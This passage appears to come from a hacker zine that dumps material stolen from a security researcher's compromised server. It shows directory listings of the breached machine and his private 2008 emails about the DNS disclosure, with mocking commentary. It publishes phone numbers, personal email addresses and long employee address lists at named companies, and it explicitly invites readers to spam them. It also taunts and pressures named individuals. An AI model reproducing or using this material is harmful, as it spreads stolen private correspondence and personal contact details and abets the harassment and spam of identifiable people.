-rwxr-xr-x    1 thalakan  thalakan      6917 Mar  2 21:52 portability
-rw-r--r--    1 thalakan  thalakan     81117 Apr 25 14:15 quotes.html
-rw-r--r--    1 thalakan  thalakan     16468 Apr  4 16:49 resume.html
-rw-r--r--    1 thalakan  thalakan      1443 May 26 12:35 timeline.html
-rw-r--r--    1 thalakan  thalakan       182 Jan 27 17:50 timeline.html~
-rw-r--r--    1 thalakan  thalakan    183925 Jul 19 18:06 urls.txt
drwxr-xr-x    2 thalakan  thalakan      1536 Feb  8 16:56 winbin
$ tail urls.txt
http://feeble.emolyncher.com/Kama%20Sutra/Reverse%20Cowgirl.jpg
http://www.break.com/index/garbage-can-full-of-water-prank.html
http://www.esquire.com/women/women-we-love/mary-louise-parker-naked-0809
http://qdb.us/random/SingleMotherVideo/
http://www.surgicaltechnologists.net/blog/20-scary-old-school-surgical-tools/
http://www.kuvalauta.fi/b/src/124784856262.gif
http://la.gg/upl/feedme.gif
http://11.media.tumblr.com/ce2JJn4kFpyf4gfoLCqJDkzuo1_500.jpg
http://www.reddit.com/r/IAmA/comments/8wxpm/i_am_in_love_with_my_sister_and_she_reciprocates/c0aows9
http://www.craigslist.org/about/best/mne/1175913837.html
$ cd ..
$ ls -la /root
total 192542
drwxr-xr-x   6 root  wheel        512 Feb 25 00:44 .
drwxr-xr-x  20 root  wheel        512 Aug 20  2008 ..
-rw-------   1 root  wheel       9444 Jun  9 01:15 .bash_history
-rw-r--r--   2 root  wheel        801 Mar 19  2007 .cshrc
-rw-------   1 root  wheel        337 Mar 19  2007 .history
-rw-r--r--   1 root  wheel        143 Mar 19  2007 .k5login
-rw-------   1 root  wheel        545 Apr 24 17:43 .lesshst
drwx------   2 root  wheel        512 Feb 28 10:09 .links
-rw-r--r--   1 root  wheel        293 Mar 19  2007 .login
-rw-------   1 root  wheel       2131 Feb  6 09:48 .mysql_history
-rw-r--r--   2 root  wheel        251 Mar 19  2007 .profile
-rw-------   1 root  wheel       1024 Nov  5  2008 .rnd
drwx------   2 root  wheel        512 Nov 24  2008 .spamassassin
drwx------   2 root  wheel        512 May 29  2007 .ssh
drwxr-xr-x   2 root  wheel        512 Feb 25 00:44 bin
-rw-------   1 root  wheel   77104614 Nov 24  2008 ktrace.out
-rwxr-xr-x   1 root  wheel         94 Sep 24  2007 moveit.sh
-r--r--r--   1 root  wheel       3899 Sep 15  2007 ports-supfile
-rw-r--r--   1 root  wheel  119848679 Sep 24  2007 rsync.log$ ls -la /
total 61
drwxr-xr-x  20 root  wheel   512 Aug 20  2008 .
drwxr-xr-x  20 root  wheel   512 Aug 20  2008 ..
-rw-r--r--   2 root  wheel   801 Mar 19  2007 .cshrc
-rw-r--r--   2 root  wheel   251 Mar 19  2007 .profile
-r--r--r--   1 root  wheel  6196 Mar 19  2007 COPYRIGHT
drwxr-xr-x   4 root  wheel   512 Dec 30  2007 arc
drwxr-xr-x   2 root  wheel  1024 Mar 19  2007 bin
drwxr-xr-x   5 root  wheel   512 Mar 19  2007 boot
drwxr-xr-x   3 root  wheel   512 May 10  2007 compat
dr-xr-xr-x   4 root  wheel   512 Jan 22  2008 dev
drwxr-xr-x  18 root  wheel  2048 Jun 26 04:56 etc
lrwxrwxrwx   1 root  wheel     8 Mar 19  2007 home -> usr/home
drwxr-xr-x   3 root  wheel  1024 Mar 19  2007 lib
drwxr-xr-x   2 root  wheel   512 Mar 19  2007 libexec
drwxr-xr-x   2 root  wheel   512 Mar 19  2007 media
drwxr-xr-x   2 root  wheel   512 Mar 19  2007 mnt
dr-xr-xr-x   1 root  wheel     0 Jul 20 09:49 proc
-rw-r--r--   1 root  wheel  3850 Nov 26  2008 razor-agent.log
drwxr-xr-x   2 root  wheel  2560 Mar 19  2007 rescue
drwxr-xr-x   6 root  wheel   512 Feb 25 00:44 root
drwxr-xr-x   2 root  wheel  2560 Mar 19  2007 sbin
lrwxr-xr-x   1 root  wheel    11 Mar 19  2007 sys -> usr/src/sys
drwxrwxrwt  11 root  wheel  6144 Jul 20 09:48 tmp
drwxr-xr-x  16 root  wheel   512 Sep 22  2007 usr
drwxr-xr-x  23 root  wheel   512 Jan 22  2008 var
drwxr-xr-x   3 www   www     512 Sep 22  2007 www


                 !~~~~~~~~~~~~~~~ Spools ~~~~~~~~~~~~~~~!

Reading through Dan's emails was both pain and pleasure. There are a lot of
them. And when we say a lot, we mean that we have 1.5gb of spools from the 
period 2005-2009 before he used gmail again. After that we have all the gmail 
messages since. So without further ado, here's the whole bunch!

From effugas@gmail.com  Sat Dec 31 02:53:33 2005
Return-Path: <effugas@gmail.com>
Received: from wproxy.gmail.com (wproxy.gmail.com [64.233.184.206])
    by pmjm.net (8.12.9p2/8.12.9) with ESMTP id jBVArXYb031168
    for <dan@doxpara.com>; Sat, 31 Dec 2005 02:53:33 -0800 (PST)
    (envelope-from effugas@gmail.com)
Received: by wproxy.gmail.com with SMTP id i31so1847699wra
        for <dan@doxpara.com>; Sat, 31 Dec 2005 02:53:50 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:mime-version:content-type;
        b=qQLFaGlXzW1Qpoah1J7XT1q31SfjjWsH1rerArRzvmHTpD+Bu3bsEZYemwCzPCPPrZkBU5bd1gnEdGkq2XL9PoBarsG0rRC3tZ4ZOM8Rf5zlPFstDnvHakBio0Sq5WBdP88IhndHsbEMj/cptfL7nAeTp4tre5wliJkbey9eALw=
Received: by 10.54.71.11 with SMTP id t11mr11686777wra;
        Sat, 31 Dec 2005 02:53:50 -0800 (PST)
Received: by 10.54.153.10 with HTTP; Sat, 31 Dec 2005 02:53:50 -0800 (PST)
Message-ID: <37e6ba5a0512310253ue14a571kf86b37c0f3e219fe@mail.gmail.com>
Date: Sat, 31 Dec 2005 02:53:50 -0800
From: Dan Kaminsky <effugas@gmail.com>
To: dan@doxpara.com
Subject: hiya
MIME-Version: 1.0
Content-Type: multipart/alternative;
    boundary="----=_Part_47695_12740608.1136026430437"
X-Spam-Checker-Version: SpamAssassin 3.0.4 (2005-06-05) on mail.pmjm.net
X-Spam-Level:
X-Spam-Status: No, score=0.9 required=2.0 tests=AWL,HTML_40_50,HTML_MESSAGE,
    HTML_SHORT_LENGTH,RCVD_BY_IP,SPF_HELO_PASS,SPF_PASS autolearn=no
    version=3.0.4
X-IMAPbase: 1219969072 0000120134 Junk NonJunk $Label4 $Forwarded $MDNSent $Label5 $Label3 $Label1 $Label2
Status: RO
X-Status:
X-Keywords:
X-UID: 1

------=_Part_47695_12740608.1136026430437
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

so yeah

------=_Part_47695_12740608.1136026430437
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

so yeah<br>
<br>

Kidding! Somehow we think a 2gb zine might be overdoing it a little bit.
 
The first shocking thing about Dan's mailbox is just how many people he knows.
He has hundreds of contacts in the security industry. Dozens upon dozens in
corporate programming, ISPs, government, military, education, media, and 
anywhere else tech support can be found. After his DNS crap in 2008, he had 
dozens of aspiring young researchers offer to blow him. Lots of people
basically emailed asking to be his friend. 

At that time, he even had a number of prominent security researchers or
prominent internet bitches all but offer handjobs to get in on the scoop. They
wanted any piece of the action, even just enough to throw up a blog post saying
they've been collaborating with the great Dan Kaminsky. Everyone emailed to
congratulate him and offer their support.
 
Shame on them all.  Here's a little example:


Scott Applegate, CISSP, a Business Partner at US Army, requested to add 
you as a connection on LinkedIn:
------------------------------------------

Dan,

Worked with you about a year ago when we were looking at the RFID 
capture device at IOActive.  Would like to keep in touch with you all 
for potential future issues, ideas, etc.  Gratz on the DNS discovery and 
very impressed with the way you handled the entire affair.

- Scott


Of all people, lcamtuf was almost the voice of sanity. He turned down Dan
and told him to stop hyping. Who would have thought it?

At one point Dan sent out an email to a bunch of his friends, asking for
public support. These include:

Jay Beale
Ben Laurie
Johnny Long
lcamtuf
FX
mudge
the dude behind myspace (like wtf...) 
Paul Schmehl

Here's an example conversation coming from that:

From: Johnny Long <ihackstuff@gmail.com>
To: Dan Kaminsky <dan@doxpara.com>
Content-Type: multipart/alternative;
    boundary=Apple-Mail-1-58232512
X-Mailer: iPhone Mail (5A345)
Mime-Version: 1.0 (iPhone Mail 5A345)
Subject: Fwd: Help
Date: Tue, 22 Jul 2008 10:15:15 -0400
References: <64E431FF-F148-42F5-9497-960D0B8A7912@gmail.com>
Content-Length: 14269
Status: RO
X-Status:
X-Keywords:
X-UID: 114100


--Apple-Mail-1-58232512
Content-Type: text/plain;
    charset=us-ascii;
    format=flowed;
    delsp=yes
Content-Transfer-Encoding: 7bit

Stupid reply to self!

Johnny

Sent from my iPhone

Begin forwarded message:

> From: Johnny Long <ihackstuff@gmail.com>
> Date: July 22, 2008 10:13:03 AM EDT
> To: Johnny Long <ihackstuff@gmail.com>
> Subject: Re: Help
>

> Also feel free to call to discuss 410-599-8672.
>
> Johnny
>
> Sent from my iPhone
>
> On Jul 22, 2008, at 9:29 AM, "Johnny Long" <ihackstuff@gmail.com>
> wrote:
>
>> On 7/22/08, Johnny Long <ihackstuff@gmail.com> wrote:
>>> Unless I'm missing something, I'm behind you, but what can I do? You
>>> want a sound bite from me, I'll be glad to give it to you as long as
>>> it doesn't make me sound like a raging idiot. =D
>>
>> Belay that. You're my friend. I would gladly look like a raging idiot
>> (or even stake my career) defending my friends.
>>
>> What's the next step?
>>
>>>
>>> On 7/22/08, Dan Kaminsky <dan@doxpara.com> wrote:
>>>> There are two paths -- pills, if you will.  One says:
>>>>
>>>> "Unless there's a full vulnerability for me to look at, I don't
>>>> want to hear
>>>> about it, especially if you're saying the patch is extremely
>>>> important"
>>>>
>>>> The other says:
>>>>
>>>> "If it is possible to have some time to deploy an extremely
>>>> important patch,
>>>> without knowing the vulnerability, give me the time."
>>>>
>>>> I went through an astonishing amount of pain in support of the
>>>> latter.  I
>>>> have gotten absolutely no support from the community for those
>>>> actions.  If
>>>> I've gotten beaten up this badly, I can guarantee the latter will
>>>> never
>>>> happen again.
>>>>
>>>> If you think that's a good thing, OK.  If you, or your customers,
>>>> think
>>>> that's a bad thing, I need people on the record saying so --
>>>> saying that,
>>>> all things being equal, 30 days was better than 0.
>>>>
>>>>
>>>> Johnny Long wrote:
>>>>> hello my friend.
>>>>>
>>>>> what can i do to help you?
>>>>>
>>>>> johnny
>>>>>
>>>>> On 7/21/08, Dan Kaminsky <dan@doxpara.com> wrote:
>>>>>
>>>>>
>>>>>> I may need some help surviving this whole DNS thing.  Would you
>>>>>> be able
>>>> to
>>>>>> support my approach?
>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>
>>>>>
>>>>>
>>>>>
>>>>
>>>
>>>
>>> --
>>> Hackers For Charity Quickstats:
>>> Microprojects Completed: 3 Active: 4
>>> Registered Volunteers: 175
>>> Funds raised: $US 4,000(+); $L 22,000
>>>
>>
>>
>> --
>> Hackers For Charity Quickstats:
>> Microprojects Completed: 3 Active: 4
>> Registered Volunteers: 175
>> Funds raised: $US 4,000(+); $L 22,000


/* 
* How charitable of johnny. Looks out for his friends.
* 
* How about this one? */


Sure I would be happy to help you.  I got you a few email address of the
companies you wanted.  Let me know if there=B9s anything else I can do:
 =20
Jessica   Alter   Bebo   Bizdev   jessica@bebo.com   415 243-4821
  Kent   Lindstrom   Friendster
  Craig   Newmark   Craigslist       craig@craigslist.com
  Jim   Bankoff   AOL   Former EVP Product   bankoff@aol.com
  Edwin     Aoki   AOL   Technology Fellow   aoki@aol.net
  Michael   Jones   AOL   VP   mjones@userplane.com
  Reid   Hoffman   LinkedIn   Founder   rhoffman@linkedin.com
  Ramu   Yalamanchi   HI5   CEO/Cofounder   ramu@hi5.com
  Akash   Garg   Hi5   CTO/Cofounder   akash@hi5.com

On 7/21/08 6:46 PM, "Dan Kaminsky" <dan@doxpara.com> wrote:

> Aber,
>=20
>     I'm in a bit of a bind.  A fellow security researcher leaked my DNS
> attack.  I am not convinced that I will ever be able to get people
> advance notice on a vulnerability again, if I do not have significant
> support for the 30-day approach I attempted to pioneer.
>=20
>     Is it possible that MySpace could support my approach here?  It will
> not likely happen again without a pretty serious burst of support soon.
>=20
> --Dan
>=20
>=20


//~~~~ Or:

From: "Billy Rios" <billy.rios@gmail.com>
To: "Dan Kaminsky" <dan@doxpara.com>
Subject: DNS bug Public
MIME-Version: 1.0
Content-Type: multipart/alternative; 
        boundary="----=_Part_52998_31292324.1216710994768"
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 114036

------=_Part_52998_31292324.1216710994768
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

DAN!  Heard the DNS bug went public inadvertently :(  that sucks dude.

I'm still thankful (as I'm sure millions of others) that you put forth the
time and effort to coordinate the most massive security fix in history.
I'll buy you a beer (or two) in Vegas!

BK


// Here's another noble comrade coming to Dan's rescue:

From: Jay Beale <jay.beale@gmail.com>
To: Dan Kaminsky <dan@doxpara.com>
Content-Type: text/plain;
    charset=us-ascii;
    format=flowed;
    delsp=yes
Content-Transfer-Encoding: 7bit
X-Mailer: iPhone Mail (5A347)
Mime-Version: 1.0 (iPhone Mail 5A347)
Subject: Discussion
Date: Mon, 28 Jul 2008 22:50:13 -0700
Status: RO
X-Status: A
X-Keywords: NonJunk        
X-UID: 116776

Dan, is it too late to get involved in that discussion? I'd really   
like to defend your honor because the community is just wrong!

Jay Beale


// And another:

On Jul 21, 2008, at 9:45 PM, Dan Kaminsky wrote:

> I need your help surviving this DNS thing.  Would you be able to
> support my approach?

What's your approach? Call me either in the office (617) 873-5282 or
on my cell (781) 325-3299.

cheers,

.mudge


/*
* It's great to have friends, isn't it? You get the idea.
*
* Dan then made ilja into his translation bitch. It was hilarious. This is how it started: */

To: Dan Kaminsky <dan@doxpara.com>
From: Ilja <ilja@netric.org>
Reply-to: Ilja <ilja@netric.org>
Subject: Re: ZOMG
Message-ID: <b70d0f3962383f91884ff685a1161742@82.33.206.203>
X-Priority: 3
X-Mailer: UebiMiau [PHPMailer version 1.70]
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/plain;
    charset="iso-8859-1"
X-Virus-Scanned: Xentra AntiVirus
Status: RO
X-Status: A
X-Keywords:
X-UID: 116250

you want the whole pdf translated ?

--------- Oorspronkelijk bericht --------
Van: Dan Kaminsky <dan@doxpara.com>
Naar: Ilja <ilja@netric.org>
Onderwerp: ZOMG
Datum: 27/07/08 05:27

>
>
http://security4all.blogspot.com/2008/07/govcertnl-publishes-kaminsky-code.html
>
> I CAN HAS TRANSLATE?!?!??!?!
>

/*
* If it was dutch and it mentioned Dan, ilja got stuck translating it.
*
* We kind of want to take advantage of this free Dutch->English translation
* service. ilja, since we're feeling nostalgic, can you gather the boys and dig
* up any old private netric logs, from when you guys actually did shit? If you go
* ahead and do this for us, it'll really be easier for everyone in the long run
* ;)
*
* Don't forget to translate any and all Dutch!
*
* Speaking of ilja... */


"Ilja van Sprundel \(N. Runs GMBH\)" <v-iljav@microsoft.com>
along with ilja@suresec.org and ilja@netric.org of course

If you guys are looking for people to spam, you could always add this list:

From: "Damon P. Cortesi" <damon.cortesi@ioactive.com>
From: "Josh J. Pennell" <joshp@ioactive.com>
From: "Joshua J. Pennell" <joshua.pennell@ioactive.com>
From: "Justin N. Ferguson" <justin.ferguson@ioactive.com>
From: "Nicole Tatrow (IOActive)" <nicole.tatrow@ioactive.com>
From: "Robert M. Zigweid" <Robert.Zigweid@ioactive.com>
From: <joe.smith@ioactive.com>
From: Anthony Rossano <anthony.rossano@ioactive.com>
From: Chris Paget <Chris.Paget@ioactive.com>
From: Dan Kaminsky <Dan.Kaminsky@ioactive.com>
From: Dan Kaminsky [Dan.Kaminsky@ioactive.com]
From: Dan Kaminsky [mailto:Dan.Kaminsky@ioactive.com]
From: Dan Schaffner <daniel.schaffner@ioactive.com>
From: Daniel Schaffner <daniel.schaffner@ioactive.com>
From: Eric Rachner <Eric.Rachner@ioactive.com>
From: Forrest Rae <forrest.rae@ioactive.com>
From: Jason Larsen <jlarsen@ioactive.com>
From: Jason Waldhelm <jason.waldhelm@ioactive.com>
From: Jill Levine <Jill.Levine@ioactive.com>
From: Josh Pennell <josh.pennell@ioactive.com>
From: Joshua Betts <Josh.Betts@ioactive.com>
From: Joshua J. Pennell [mailto:joshua.pennell@ioactive.com] 
From: Joshua Pennell <Joshua.Pennell@ioactive.com>
From: Justin Ferguson <jferguson@ioactive.com>
From: Justin Ferguson <justin.ferguson@ioactive.com>
From: Lauren Vogt <lauren.vogt@ioactive.com>
From: Maren Morrison <maren.morrison@ioactive.com>
From: Megan Knox <megan.knox@ioactive.com>
From: Natalie Ervin <natalie.ervin@ioactive.com>
From: Rob Harvey <rob.harvey@ioactive.com>
From: Robert Zigweid <Robert.Zigweid@ioactive.com>
From: Shannon James Smith <shannon.smith@ioactive.com>
From: Shannon Smith <global@ioactive.com>
From: Shannon Smith <shannon.smith@ioactive.com>
From: Ted Ipsen <Theodore.ipsen@ioactive.com>
From: Ted Ipsen <ted.ipsen@ioactive.com>
From: Walter Pearce <Walter.Pearce@ioactive.com>
From: lauren.vogt@ioactive.com

or

From: "=?GB2312?B?v7Xx/b/i?=" <dmpzguntmntk@microsoft.com>
From: "Anthony Fung (LCA)" <anthonyf@microsoft.com>
From: "Brad Hill \(Information Security Partners\)" <v-bhill@microsoft.com>
From: "Bri Rolston (SWI)" <Bri.Rolston@microsoft.com>
From: "Chris Paget \(IOACTIVE\)" <v-cpaget@microsoft.com>
From: "Dan Kaminsky (IOACTIVE)" <v-dakami@microsoft.com>
From: "Helen Wang (MSR)" <helenw@microsoft.com>
From: "Ilja van Sprundel (N. Runs GMBH)" <v-ilvans@microsoft.com>
From: "Ilja van Sprundel \(N. Runs GMBH\)" <v-iljav@microsoft.com>
From: "John Biccum" <johnbic@microsoft.com>
From: "Kurt Swanson" <fastin-482@microsoft.com>
From: "Kymberlee Price" <Kymberlee.Price@microsoft.com>
From: "Stephen Toulouse" <stepto@microsoft.com>
From: "Zot O'Connor" <zoto@microsoft.com>
From: "Zot_O'Connor" <zot@microsoft.com>
From: "jajirn" <jajirnxqmbg@microsoft.com>
From: Adam Shostack <Adam.Shostack@microsoft.com>
From: Bri Rolston <Bri.Rolston@microsoft.com>
From: Bronwen Matthews <bronwenm@microsoft.com>
From: Dan Kaminsky (IOACTIVE) [mailto:v-dakami@microsoft.com] 
From: Dave Tamasi <dtamasi@microsoft.com><br>
From: Dave Tamasi <dtamasi@microsoft.com>
From: Dave Tamasi [<a href=3D"mailto:dtamasi@microsoft.com">mailto:dtamas=
From: Dave Tamasi [<a href=3D"mailto:dtamasi@microsoft.com">mailto:dtamasi@=
From: Dave Tamasi [mailto:dtamasi@microsoft.com]
From: Dave Tamasi [mailto:dtamasi@microsoft.com]=20
From: Ian Hellen <Ian.Hellen@microsoft.com>
From: Jack Couch (Deepintel Solutions LLC) <v-jackco@microsoft.com>
From: Josh Lackey <Joshua.Lackey@microsoft.com>
From: Josh Lackey [mailto:Joshua.Lackey@microsoft.com] 
From: Kathryn Gillespie <Kathryn.Gillespie@microsoft.com>
From: Katie Moussouris <katiemo@microsoft.com>
From: Kay Hersrud <Kay.Hersrud@microsoft.com>
From: Kymberlee Price <Kymberlee.Price@microsoft.com>
From: Kymberlee Price [<a href=3D"mailto:Kymberlee.Price@microsoft.com">mai=
From: Kymberlee Price [mailto:Kymberlee.Price@microsoft.com]
From: Lili Cheng <lilich@microsoft.com>
From: Lili Cheng [mailto:lilich@microsoft.com]=20
From: Mark Novak <Mark.Novak@microsoft.com>
From: Peter Beck <Peter.Beck@microsoft.com>
From: Robert Gu <Jianrong.Gu@microsoft.com>
From: Rodney Buike <Rodney.Buike@microsoft.com>
From: Stephen Toulouse <stepto@microsoft.com>
From: Thomas Hargrove <Thomas.Hargrove@microsoft.com>
From: csov@microsoft.com


/* Figuring out which ones are real/active is left as an exercise for the
* reader!
*
* Okay, the next thing you notice about Dan's spools is just the volume of mail
* he got in July 2008 especially. You start reading a day of his emails, you get
* tired, and then you just hold your finger on Page Down. Pull it off after a
* while and you're still not out of the day.
*
* The only work Dan did in July was reading and answering emails. Even just the
* quantity going out was massive. The other little thing he did....was sort of
* let everyone else do research for him. Basically dozens upon dozens of people
* emailed Dan with their theories, and if what they said was accurate, Dan said
* it was part of the research he had covered, but he appreciated their concern
* and congratulated them on their quick thinking ;p
*
* Did Dan hand out any credit at his talk that year? Because he sure should
* have...
*
* There was one thing he was almost honest about, and that's this: */

> >On Thu, Jul 24, 2008 at 09:26:27AM -0700, Dan Kaminsky wrote:
> >
> >>Halvar was like the tenth to figure it out.  I'm not impressed by all
> >>the complaining from people not smart enough to figure the bug out.

/* People *did* email Dan with the solution. I think the first was only a few
* days after he made a fuss. How many got shouts? I don't think he ever replied
* back with "You got it" */

// Here's him talking with Halvar

From: Halvar Flake <halvar@gmx.de>
User-Agent: Thunderbird 2.0.0.14 (X11/20080502)
MIME-Version: 1.0
To: Dan Kaminsky <dan@doxpara.com>
Subject: Re: A small note
References: <487B9899.80704@doxpara.com>
In-Reply-To: <487B9899.80704@doxpara.com>
X-Enigmail-Version: 0.95.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
X-Provags-ID: V01U2FsdGVkX18oRXbSi0zq0CHrQHTL7+EFDu3Q3TZXHK2uDx8
 hBLYOu2gPkN7/stde7vT0tX4exBrMEjrKrnh2u/b2zX+wkBGyv
 L4CpIEFzrCXIhw0WFMRRRcF+OdKHBTDNaXrKTmpBjs=
Content-Length: 2887
Status: RO
X-Status: A
X-Keywords:
X-UID: 113198

>Yes, this is a very tough position to be in.  I am obligated not to
defend myself.

Ahwell, such is life ;) -- and you'll survive. :)

>However, if you like, you are welcome to come to my talk and take the
microphone
> after, to tell the entire audience what you think, having heard the
full details.

Thanks for the offer, but I'll decline. If we agree, there's nothing to
discuss, and if we disagree,
a controversy in the open would be famewhoring by both of us :-P
You and I have better things to do with our time (I prefer to let the
nontechs deal with the
politricks of it all).

There's several reasons why I should avoid any panel discussion anyhow:
* My final final final exam is on 1st of August, so I will arrive in
Vegas looking like cannonfodder
from House of the Dead. I will have spent several weeks on math, so I
will be unable to speak
intelligibly, and walk in a shuffle. When I am tired, I tend to revert
german in mid-sentence, and I spill
coffee on my shirts, neither of which helps. People would mistake me for
a character from a game.
* I have to avoid plenum discussions like the plague nowadays. The
industry has
changed in a way that is quite incompatible with my views -- I'd just
offend people :-)
Examples:
    * I remember the upset I caused to some members of the audience at
CSW a few years back when
    I recommended that the proper response to being owned by someone
through a chain
    of bouncers would be to own the bouncer chain, one by one, to get to
the source.
    * I tend to not take security too seriously. This tends to offend
audiences at such conferences,
    because they all want to feel important, and I think we are not
1/3rd as important as we'd like to think.

I am certain that you have a really cool and really original attack -- I
just think that if
OpenSSH and Bind _remote_compromises_ (which were pretty darn reliable,
too) didn't warrant "silent period after patches are out", then this
certainly
doesn't either. And if the argument is that this problem is easier to
exploit than the above
bugs: "%25%5C" was as easy as it gets, _and_ SSL certs don't help Joe
Sixpacks any
more if the server is compromised.
In all these cases, we didn't need 30 days of artificial suspense.

Also, we all remember the time when vuln info on the defensive side was held
in clubby little groups. The only result of that was that all serious
attackers compromised
some list members, and people that were neither serious attackers nor on
that list
got shafted ;).

But well. All this is politricks, and as such should be left with people
that have no
real work to do :-)

Good luck in the madness over the next few weeks.

I need to get back to my books :-/ (still heaps of work for the exam
tomorrow, and it's
boring shit on top of it :(

Cheers,
Halvar
PS: What happened on the RE with IDA book ? It was definitely not what
it should've been.


// And later:

Hey Dan,

>Oh, I'll survive.  Who ever would have thought the vendors would be the
easy people to work with?

Haha. Yeh. It shows how the environment has changed -- I still remember
a few
southern german gentlemen reminding me to "quit fucking with the
israelis" when
I did work on Checkpoint a few years back.

>Well, you know, you did sort of start it.  (...)
>Well, man, why'd you have to go in and shit on me publicly then?  I'm
out there trying to get people safe
> and you're like, meh, big whoop...and then, now that you've entered
the discussion, you're like "well
> I don't really want to get involved".  You got involved -- to the
point people are reporting on it.  You're
>respected, I mean, you're respected by *me*.  It's a fairly big deal
for you to enter the discussion and say this doesn't matter.

See my comment above on my reason for avoiding panels: I open my mouth,
speak my mind,
and people get pissed off. Apparently this happens to my blog posts, too :-/

Like, I didn't think saying that "the sky isn't falling" and "we've
survived worse before, with less vendor coordination"
counted as shitting on you publicly. It wasn't _meant_ that way, and I
hope it's not being
construed as such.

Most of all, I was not trying to denigrate your findings. I value
originality in thought above
everything, and finding a protocol attack that has been hiding in "plain
view" is something you
can be very proud of. It is a sign of significant originality, which is
both rare and valuable.

I am a bit dismayed at how my blog post (which I think was quite
reasonable) was spun by
reporters ("...DNS flaw called overblown...").  I also wrote that
it is quite conceivable that my calm in these circumstances is misguided
('russian roulette').
So I don't see this as shitting on you in public. It's a disagreement on
wether the yellow or the
red alert light is flashing. If you see this differently, please make a
suggestion
on how I can clarify my posts.

I guess to summarize: I think my blog posts were measured & balanced. I
might be wrong
(sose damn germans are not exactly known for seir sense of diplomacy ;),
so if these posts can
be read in a more negative light I'll try to fix it.

Regarding coming to the stage at Blackhat: I won't, for several
(serious) reasons:
* I am deeply opposed to a culture of "there is controversy between X
and Y at Blackhat, let's go see it".
There is no controversy, there is a technical, and perhabs
philosophical, discussion, between two
resonable adults. That is not a spectator sport. I don't want to have a
principal role in
"Ric Flair vs. Shawn Michaels". I very much disliked how the
Matasano/Joanna thing was artificially
whipped up last year, principally to generate press hits for both
parties. I will have no part in
something like this.
* I am also deeply opposed of having this discussion happen at a for-pay
event with reporters present,
who will then put a very different spin on it. This just serves to make
CMP and the media rich,
while running counter to the original culture of discussion in our
community (e.g. mailing lists).

>Syngress published me when I was nothing but an intern at Cisco.   They
needed this book finished,
>and as a personal favor, I made that happen -- watched over the guys
who knew IDA Pro (I know
>nothing of it!), poked them every 24 hours, got it written. My name
wasn't supposed to be on
>the cover.  I don't even know what happened with the bio.  This all
mortified me even before I knew
>of the quality issues.

Ouch. That's the way things go :-/

Good luck with * !

Cheers,
Halvar


// Things heating up between prominent whitehats Halvar Flake and Dan Kaminsky!


>Mostly a mention that -- heh, lets reserve judgement until we see the
talk -- that'd be fine.

I will write sth longer if you don't mind, and run it by you beforehand.
I am a bit annoyed
by the fact that what used to be a nice discussion on a mailing list is
now easily hyped by
the press into "A says X but B says Y ! Fight !", so I will have a short
comment on it.

>OK, you win, completely.  I could not agree with you more.  I do look
forward to your opinion after the talk, but running something for the
press is the very >definition of counterproductive.  It's just not what
our community needs.

:-)

>Bleagh.  Yeah.

I agree on the Bleagh. The exam went horrible, to the point that I asked
the examiners about 2/3rds through
wether it makes sense to continue. I still passed, but holy fuck.

>> Good luck with * !
>>
>>
> Thanks!
>> Cheers,
>> Halvar
>>
>


On July 22nd, to Christopher Davis, chris@defintel.com:

Dan Kaminsky wrote:
> I could use help getting people on the record supporting me.  I have
> about 48 hours until the security community eats me alive for thinking
> the bug was lame, because you know, they still don't get it.
>=20
> Halvar and I were going back and forth on email.  You have to remember
> he's a kid, an insanely bright kid, but just a kid whose first post on
> the subject was that everyone should just assume their gateway is owned=

> and use SSL.  I simply feel sorry for Halvar, at worst.
>=20
> Ptacek is another story.  Think for a moment what it means that somebod=
y
> who is not Ptacek was able to leak anything.
>=20
> --Dan
>=20
> Christopher Davis wrote:
>> OK this sucks. I used think halvar was cool. Now I think he is a DICK.=

/* So some guy emails you to kiss ass and diss Halvar, and you respond asking
* for his help, and then diss Halvar yourself?
*
* After this Dan dissed Halvar to anybody who brought him up. Dan has this
* trend of dissing people more talented than him, including Halvar, Sotirov, and
* Dino. He is most cozy with people just as untalented as himself. Don't need to
* name names there, the crowd is obvious.
*
* By the way, here's a nice list of whitehat emails for you to spam. Hard to
* miss, with Dragos emailing them all so often: */


From: Dragos Ruiu <dr@kyx.net>
To: Dragos Ruiu <dr@dursec.com>, rgula@tenablesecurity.com,
        roesch@sourcefire.com, fygrave@o0o.nu, rfp@wiretrip.net,
        aleph1@securityfocus.com, jason.dorie@blackboxgames.com,
        Fyodor <fyodor@insecure.org>, spikeman@spikeman.net,
        Lance Spitzner <lance@spitzner.net>, phillip.ibis@blackboxgames.com,
        priest@sfu.ca, hdm@digitaloffense.net,
        Nicolas FISCHBACH <nico@securite.org>, kaneda@securite.org,
        andy@dragonfly.demon.co.uk, ktwo@ktwo.ca, ajarman@timeindustrial.com,
        zindelak@telus.net, jeff@snort.org, smkoen@hotmail.com,
        newspixie@hotmail.com, Will Whittaker <mock@obscurity.org>,
        tiffkary@hotmail.com, kmx@egatobas.org, hectorh@pobox.com,
        emxlists@tstf.net, vanja@vanja.com, dje@bht.com, dugsong@monkey.org,
        lyndon@orthanc.ca, mts@off.off.to, paudley@blackcat.ca,
        robert_david_graham@yahoo.com, Peter Wong <peter_wong@pmc-sierra.com>,
        dfreelove@rogers.com, jay@intelguardians.com, phil@ccc-ltd.com,
        jed@pickel.net, gshipley@neohapsis.com, deraison@cvs.nessus.org,
        Theo de Raadt <deraadt@cvs.openbsd.org>, dittrich@u.washington.edu,
        ben_greenbaum@securityfocus.com, nbortnak@moro.us,
        Chris Kuethe <chris.kuethe@gmail.com>, bob.beck@ualberta.ca,
        natasha@snort.org, arr@watson.org, jfrank@b-ap.com, kkuehl@cisco.com,
        bmc@shmoo.com, talisker@networkintrusion.co.uk, halvar@gmx.de,
        richard@idealrealms.com, jennifer@granick.com,
        alfredhuger@winterhope.com, Solar Designer <solar@openwall.com>,
        ivan.arce@corest.com, rkl@blackops.org, cmg@uab.edu,
